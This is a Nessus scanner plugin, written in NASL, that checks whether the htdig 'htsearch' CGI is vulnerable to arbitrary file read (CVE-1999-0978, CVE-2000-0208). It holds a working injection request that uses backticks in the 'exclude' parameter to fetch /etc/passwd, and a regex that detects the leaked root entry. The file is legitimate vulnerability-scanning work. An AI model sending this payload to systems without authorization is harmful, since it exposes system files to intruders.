# # This script was written by Renaud Deraison # # See the Nessus Scripts License for details # if(description) { script_id(10105); script_version ("$Revision$"); script_bugtraq_id(1026); script_cve_id("CVE-1999-0978", "CVE-2000-0208"); name["english"] = "htdig"; name["francais"] = "htdig"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = "The 'htsearch' CGI, which is part of the htdig package, allows a malicious user to view any file on the target computer. Risk factor : Medium/High Solution : Upgrade to a newer version (3.1.5 or newer) available at http://www.htdig.org"; desc["francais"] = "Le CGI 'htsearch', qui appartient au package htDig, permet à un pirate de lire n'importe quel fichier sur la machine cible.> Facteur de risque : Moyen/Elevé Solution : Mettez à jour htdig en 3.1.5 ou plus récent. htdig est disponible à http://www.htdig.org"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "Checks if htdig is vulnerable"; summary["francais"] = "Détermine sihtdig est vulnérable"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison", francais:"Ce script est Copyright (C) 2000 Renaud Deraison"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("http_func.inc"); include("http_keepalive.inc"); port = get_kb_item("Services/www"); if(!port) port = 80; if(!get_port_state(port))exit(0); foreach dir (cgi_dirs()) { req = string(dir, "/htsearch?exclude=%60/etc/passwd%60"); req = http_get(item:req, port:port); result = http_keepalive_send_recv(port:port, data:req); if( result == NULL ) exit(0); if(egrep(pattern:".*root:.*:0:[01]:.*", string:result)){ security_hole(port); exit(0); } }